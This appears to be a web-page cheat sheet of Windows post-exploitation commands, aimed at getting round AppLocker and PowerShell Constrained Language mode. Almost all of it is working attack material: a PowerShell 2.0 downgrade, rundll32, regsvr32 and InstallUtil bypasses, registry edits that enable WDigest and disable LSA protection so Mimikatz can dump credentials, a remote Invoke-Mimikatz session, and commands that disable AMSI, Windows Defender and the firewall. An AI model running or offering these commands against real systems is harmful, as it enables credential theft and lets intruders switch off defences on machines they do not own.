Securitydowngrade - readloud.org

This app has been blocked by your system administrator !!!

CHECK WHERE YOU CAN DROP YOUR BINARY

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

CHECK POWERSHELL LANGUAGE MODE

$ExecutionContext.SessionState.LanguageMode

POWERSHELL VERSION DOWNGRADE

# CHECK IF OLD VERSION STILL ACTIVATED
Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
# ABUSE
powershell.exe -version 2.0

Constrained Language mode was introduced with PowerShell 3.0 and can easily be bypassed by a hacker switching to an older version.

Can not run ps1 ?
- Include you function inside the ps1 and exec .\script.ps1
- rundll32.exe .\your.dll,Void
- REGSVR32 "C:PATH\your.dll"
- .NET C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\PATH\Bypass.exe

CHANGE LANGUAGE MODE

POWERSHELL COMMAND

$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
#Note : You can switch to different mode, but you can not change after a ConstrainedLanguage.

REGISTRY PATH

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment

KEY
```
__PSLockdownPolicy
```

POSSIBLE VALUES

Data 1 : FullLanguage. 
Data 2 : RestrictedLanguage. 
Data 3 : NoLanguage. 
Data 4 : ConstrainedLanguage

SYSTEM ENVIRONNEMENT VARIABLE

Control Pannel / System & Security / System
System Properties
Environment Variables
New
__PSLockDownPolicy
Value X

Group Policies

User Configuration
Preferences
Windows Settings
Environment
Set you raviable __PSLockDownPolicy via GPO

MIMIKATZ ERROR kuhl_m_privilege_simple

# NEED SeDebugPrivilege
# Group Policy Management Editor -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment -> Debug programs -> Define these policy settings

MIMIKATZ ERROR kuhl_m_sekurlsa_acquireLSA

# ENEABLE WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

MIMIKATZ ERROR kuhl_m_sekurlsa_acquireLSA

# DISABLE LSA Protection
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0

MIMIKATZ ERROR kuhl_m_lsadump_secretsOrCache

# Computer Configuration -> Windows Settings -> Local Policy -> Security Options -> Interactive Logon: Number of previous logons to cache -> 10

Disable AMSI

# LOCAL
Set-MpPreference -DisableIOAVProtection $true
# Remote
$sess = New-PSSession -ComputerName websrv.domain.local
Invoke-command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
# REMOTE MIMIKATZ
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

DISABLE WINDOWS DEFENDER

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

REMOVE WINDOWS DEFENDER

Uninstall-WindowsFeature -Name Windows-Defender

DISABLE FIREWALL

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Set-NetFirewallProfile -Profile * -Enabled True